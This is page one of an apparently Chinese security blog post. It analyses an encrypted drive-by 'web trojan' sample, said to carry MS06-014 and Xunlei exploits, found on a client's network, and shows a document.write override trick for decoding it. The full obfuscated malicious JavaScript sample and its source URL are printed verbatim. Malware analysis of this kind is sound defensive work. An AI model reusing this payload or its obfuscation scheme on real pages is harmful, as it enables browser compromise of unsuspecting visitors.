借"3168a网马"案例来分析所谓的自写函数加密解密网马

【文章作者】: T4nk
【作者邮箱】: xs_soft@qq.com
【作者主页】: http://www.upx.com.cn

事出有因:某天 客户公司内网中毒 经过捉包一查为http://ora.3168a.com//s368%5C/NEwJs2.js

里面包含 MS06-014 讯雷 网马

其实整个解密过程相当简单(之前有说明过 所以不再...)

其中有个网马加密原型如下:

#1号---------------

以下是引用片段： <html><head><Meta Name=TestName Content=Test> <noscript><iframe></iframe></noscript><script language="javascript"> <!--wH84="3e\_rJxx\_\|",zO68="3eC32x\n3\,";0.4556224,sM2="0.8569908",zO68='\rq\]\$m0 \*\'\/sE3l26ANaIM\^\.ux\"\<FyR1\,\{\)\n\!\#QW\ kGtcSJ8i\>CO\:\-Zhjg\;\@z4\? r\(\_v\=XbP\&H\\dU9\+Bwp\~oYT\[D7\`\%\}enL\|Kf5V',wH84='\r\$\_Zv\>A\(K\:pq0D7\*BTd \[L\]Pc1\"\+Jg\@\=6HN4\ jS\}\\V\&ziO2C\<r9\#\!kfbI\|xRmX\`5Y3y\/W\{hFE\^Go\nUtn\;\?QMs\) l\'we\~\.\,a8\-u\%';function uW24(dH55){"Je2\|\,\|rxHK3J",l=dH55.length;'AP\*X0\*\'A\ %',w='';while(l--)"2eC\,r32\,HK3J",o=wH84.indexOf(dH55.charAt(l)),'AP\=A\nA\%\=0',w=(o==-1? dH55.charAt(l):zO68.charAt(o))+w;"3e\n\n\,\_Jr\|",wH84=wH84.substring(1)+wH84.charAt (0),document.write(w);'APCX\%\%\'X\='};uW24("\"\:z\`Cn\&\}0T\.IPTI\~ybT3T\:z\`Cn\&\<P\) lly\@\@\@q\|\-P\.z\&C\?\.\}Y\.\`5H6\`\~\&P\`\.\}\&\`P\~e\?\.\~\`\`\? \`yY\.\`\|I9D\@y2umq\|f8o\>y\@\@\@7\|zQ22y72q\>\|\|Y0Cz\~\.\:\~\^Y\&\?Yy1fPJP\-\~\.I1 \|\"K\:z\`Cn\&\<")//--></script><SCRIPT LaNGuAGE=JavAScRIpt>uW24("");</sCripT> <SCRipt lanGUAge=jAvAscRIPt>uW24("JqOYr\?iVqYOW\+rA\?MYi\[aic\|q\+9JpqOYr\?i9");</SCRiPt> <sCrIPt LanGUage=jAvascriPt>uW24("Zjg0239QO\#ZjWL3\&R\/ws\?8\*sL\na\nH\{KmZjWL3\&R\/GLWa6 \"8H\{KmZjWL3\&9\n\/\r9\*aHmZjO\|\"8\na3\/0a3Wa31CaO\!s8 \r9RyJo\+5wo\+T\$o\+e7o\+e7o\+THo\+Teo\+T\$o\+\$Ko\+THo\+TDo\+T\$o\+T\! JNJo\+55o\+T\@o\+eeo\+TDo\+T\!o\+T\@o\+THo\+T5o\+57o\+T\@o\+Two\+eKo\+T\! o\+T\$o\+e5o\+T\$JNJKJ\ mZjO\|\"8\na3\/0a3Wa31CaO\!s8 \r9RyJo\+\$7o\+T\@o\+e\$o\+TDo\+T5JNJo\+55o\+T\@o\+eeo\+TDo\+T\! o\+T\@o\+THo\+T5o\+57o\+T\@o\+Two\+eKo\+T\!o\+T\$o\+e5o\+T\$JNJKJ\ mZjO\|\"8\na3 \/0a3Wa31CaO\!s8\r9RyJo\+5wo\+T\$o\+e7o\+e7o\+THo\+Teo\+T\$o\+\$Ko\+THo\+TDo\+T\$o\ +T\!JNJo\+55o\+T\@o\+eeo\+TDo\+T\!o\+T\@o\+THo\+T5o\+5To\+THo\+Tto\+T\!JNJKJ\ mZj\?98\ns\?12\*9QFsL3\nwLOL10aOwLOLyJlJnJo\+T\$JnJ\+JnJOJNJJnJ\|JnJJnJOJnJOJnJQJnJo\+7dJnJo\$eJnJqJnJ\(JnJJnJ\ =JnJ1JnJ\+JnJ\"JnJ8JnJ\*JnJaJnJ9JnJo\$TJnJ2JnJsJnJ\(JnJqaJnJ3JnJ3sJnJ3JnJo\+BDo\+e5JnJ\+JnJJnJo \+e5J\ mZj\r\"82O9s8\&a\+a2Hy\ Zj4Zj 9\ryR\/GLWa6\"8H\{\{H\ Zj 4Zj O\|\"8\na3 \/0a3Wa31wa\*aOalL0zy9\n\/\r9\*aHN\&K\ mZj 3aO\"38mZj \,Zj WL3\&3aO\{O\|\"8 \na3\/0a3Wa31kQa8lL0z\@9\*ay9\n\/\r9\*aHN\&bH\ mZj 9\ry3aO\{\{K\ R\/GLWa6 \"8H\{HmZj\,ZjZj\r\"82O9s8\&6\"8dQQHy\ Zj4Zj WL3\&L3\=\{O\|\"8\na3\/0a3Wa31iaOlL0z\- 90OyJo\+7Ho\+7HJN\&KN\&HN\&K\ 10Q\*9OyJ4o3\:o3\,J\ mZj 9\n\/\r9\*aH\{L3\=\'H\>mZj 0aO\]8Oa3WL\*ypa\+a2Hy\ pN\$KK\ mZj\,ZjZj\r\"82O9s8\&2s\(\(9O\/OL0zHy\ Zj4Zj Zj WL3 \&3aO\&\{\&O\|\"8\na3\/0a3Wa31\! s\(\(9OlL0zyKN\&J\|JnJOJnJOJnJQJnJfJnJqJnJqJnJo\+T\@o\+eBo\+THo\+BDo\+77o\+7Ho\+7To\ +7ro\+THo\+BDo\+T7o\+T\@o\+Two\+B\@o\+\$7o\+77o\+7To\+7ro\+B\@o\+\$7o\+77o\+7To\+7ro\ +BDo\+e7o\+T7o\+eBJN\&Jo\+T7o\+7do\+\$\!o\+\$\!J\ mZj 9\r\&y3aO\&\{\{\&K\^\^R\/ws\?8\*sL\na\nH\{\{K\ Zj 4Zj Zj R\/ws\?8\*sL\na\nH\{HmZj O\|\"8\na3\/0a3Wa31G9\na\;3s\?0a3V98\ns\?yH\ mZj 6\"8dQQHy\ mZj \,Zj a\*0a\&Zj 3aO\"38mZj\,Zj0aO\] 8Oa3WL\*ypo\+T7o\+T\@o\+Two\+Two\+Tto\+e5o\+\$\@o\+e5o\+THo\+e7o\+T\;o\+7Ho\ +Bro\+BtpNH\mZjWL3\&0O3U3\*\&\{\&RaO\/0a3Wa3\/QLO\|y\ \&n\&Jo\+\$Ko\+THo\+Teo\+T\$o\+B\@o\+THo\+T5o\+T5o\+\$\@o\+e5o\+THo\+e7o\+T\;o\ +BDo\+Tro\+e5o\+TwJmZjO\|\"8\na3\/0a3Wa31CaO\;3s\?0a3V98\ns\?wLOLy0O3U3 \*N\&Jo\"TeBdo\"eeD\$o\"t\$Hto\"r\;D\@J\ mZjgq0239QO\#")</script></head><body></body></html>

#1号---------------

可能你会看起来眼花哦 呵呵

真所谓万变不离其中

万法归宗 嘿嘿 扯的有点远啦

由于任何加密的网马都要通过浏览器来执行 .... 所以怎么变也是要变为"原形"的

SO

直接用手工解密:

以下是引用片段： <html> <script>document._write = document.write; document.write = function(html) {this._write (html.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")); }; document.writeln = function(html){this.write(html);this.write("\r\n");}</script><pre><!-- 请把加密的代码完整贴上箭头的后面 然后运行代码后 浏览器会告诉你解密后的代码 嘿嘿 下面是箭头 -->

上面那段#1号

[1] [2] 下一页